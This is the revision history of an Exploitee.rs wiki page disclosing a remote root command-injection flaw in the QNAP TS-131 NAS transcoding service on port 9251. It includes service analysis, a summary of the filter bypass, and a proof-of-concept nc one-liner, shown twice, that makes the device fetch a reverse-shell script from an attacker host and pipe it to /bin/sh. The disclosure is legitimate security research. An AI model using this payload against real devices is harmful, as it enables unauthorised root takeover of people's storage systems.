https://www.Exploitee.rs/index.php?title=QNAP_TS-131&feed=atom&action=historyQNAP TS-131 - Revision history2024-03-29T14:34:19ZRevision history for this page on the wikiMediaWiki 1.37.2https://www.Exploitee.rs/index.php?title=QNAP_TS-131&diff=2886&oldid=prevZenofex at 12:30, 10 August 20172017-08-10T12:30:24Z<p></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 12:30, 10 August 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l64">Line 64:</td>
<td colspan="2" class="diff-lineno">Line 64:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>printf "\x01\x00\x00\x00/|curl\t-s\t-k\thttp://<ATTACKER_IP>/reverseshell.sh|/bin/sh|\x00" | nc <DEVICEIP> 9251</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>printf "\x01\x00\x00\x00/|curl\t-s\t-k\thttp://<ATTACKER_IP>/reverseshell.sh|/bin/sh|\x00" | nc <DEVICEIP> 9251</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></pre></div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></pre></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;"></ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">==== Demo ====</ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">{{#ev:youtube|gXbFGECtZXE}}</ins></div></td></tr>
<!-- diff cache key gtvhack_wiki:diff::1.12:old-2803:rev-2886 -->
</table>Zenofexhttps://www.Exploitee.rs/index.php?title=QNAP_TS-131&diff=2803&oldid=prevZenofex: Zenofex moved page QNAP TS131 to QNAP TS-1312017-08-06T13:30:53Z<p>Zenofex moved page <a href="/index.php/QNAP_TS131" class="mw-redirect" title="QNAP TS131">QNAP TS131</a> to <a href="/index.php/QNAP_TS-131" title="QNAP TS-131">QNAP TS-131</a></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 13:30, 6 August 2017</td>
</tr>
<!-- diff cache key gtvhack_wiki:diff::1.12:old-2801:rev-2803 -->
</table>Zenofexhttps://www.Exploitee.rs/index.php?title=QNAP_TS-131&diff=2801&oldid=prevZenofex: Created page with "__FORCETOC__ {{Disclaimer}} thumb Category:Network Attached Storage == About == The QNAP TurboStation is a series of network attached..."2017-08-06T13:29:56Z<p>Created page with "__FORCETOC__ {{Disclaimer}} <a href="/index.php/File:Qnap_TS131.jpg" title="File:Qnap TS131.jpg">left|100px|thumb</a> <a href="/index.php/Category:Network_Attached_Storage" title="Category:Network Attached Storage">Category:Network Attached Storage</a> == About == The QNAP TurboStation is a series of network attached..."</p>
<p><b>New page</b></p><div>__FORCETOC__<br />
<br />
{{Disclaimer}}<br />
[[File:Qnap_TS131.jpg|left|100px|thumb]]<br />
[[Category:Network Attached Storage]]<br />
<br />
== About ==<br />
The QNAP TurboStation is a series of network attached storage devices.<br />
<br />
== Purchase ==<br />
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.<br />
[https://www.amazon.com/TS-431P-US-4-bay-Personal-Cortex-1-7GHzDual/dp/B01N2K147Q/ref=as_li_ss_tl?ie=UTF8&qid=1502023602&sr=8-5&keywords=qnap+ts&linkCode=ll1&tag=exploiteers-20&linkId=b16ee2791963409b68466b3d0d50309f Purchase the QNAP TS-431 (4-bay version of 131) at Amazon]<br />
<br />
== Transcoding Service Remote Root==<br />
QNAP NAS's run a service used to transcode files. This service is vulnerable to a command injection vulnerability resulting in remote command execution.<br />
<br />
'''This attack works on a number of QNAP models but was originally tested on a TS-131'''<br />
<br />
=== Transcoding Service RCE Analysis ===<br />
<br />
Below shows the binary used for transcoding files listening on 9251<br />
<pre><br />
$ lsof –I<br />
mytransco 8645 admin 6u IPv4 26431 0t0 TCP *:9251 (LISTEN)<br />
$ netstat –aen<br />
tcp 0 0 0.0.0.0:9251 0.0.0.0:* LISTEN <br />
$ ps aux<br />
8645 admin 3816 S /usr/local/medialibrary/bin/mytranscodesvr -s -u -debug –db /share/CACHEDEV1_DATA <br />
</pre><br />
<br />
This services runs as root and listens on port 9251 and messages are in the following format.<br />
<br />
<pre><br />
0x01 0x00 0x00 0x00 /PATH/TO/FILE 0x00 <br />
[_____COMMAND ID_____] [___NULL TERMINATED ARG___]<br />
</pre><br />
<br />
The above example uses the id for the "rmfile" command. This command's code contains a vulnerability which can be leveraged for remote code execution. The hex-rays output of the command's code can be seen below.<br />
<br />
[[File:QNAP_TS131_rmfile_decompile.png|575px]]<br />
<br />
In the above for case "1", a buffer is allocated and then a call is made to the "removeFileFromDatabase" method. The hex-rays output of which can be found below.<br />
<br />
[[File:QNAP TS131 StringConvert2SystemCmdFilename decompile.png|550px]]<br />
<br />
The "removeFileFromDatabase" then attempts to sanitize the user input with a function called "StringConvert2SystemCmdFilename", this function filters "0x20 ! $ & 0x39 , ; = [ ] ^ ` { } %" but does not filter pipes or backslashes. This allows us to craft a payload utilizing pipes for command injection and tabs (\t) instead of spaces for field separation.<br />
<br />
====Vulnerability Summary====<br />
* Transcoding service runs on multiple QNAP NAS's<br />
** Listens on TCP port 9251 <br />
** Service runs as root<br />
** Accepts commands to transcode files<br />
** Command "rmfile" is vulnerable to a command injection <br />
** Sanitization routine filters most unsafe characters<br />
*** Except vertical pipe!<br />
*** Spaces are filtered<br />
**** Use tabs between arguments<br />
*** Filters: 0x20 ! $ & 0x39 , ; = [ ] ^ ` { } %<br />
*** Doesn't filter | or \<br />
<br />
===POC===<br />
Sending a message to the transcoding server with command id 0x01, starting/ending with a pipe, and a tab delimited command results in RCE as root<br />
<pre><br />
printf "\x01\x00\x00\x00/|curl\t-s\t-k\thttp://<ATTACKER_IP>/reverseshell.sh|/bin/sh|\x00" | nc <DEVICEIP> 9251<br />
</pre></div>Zenofex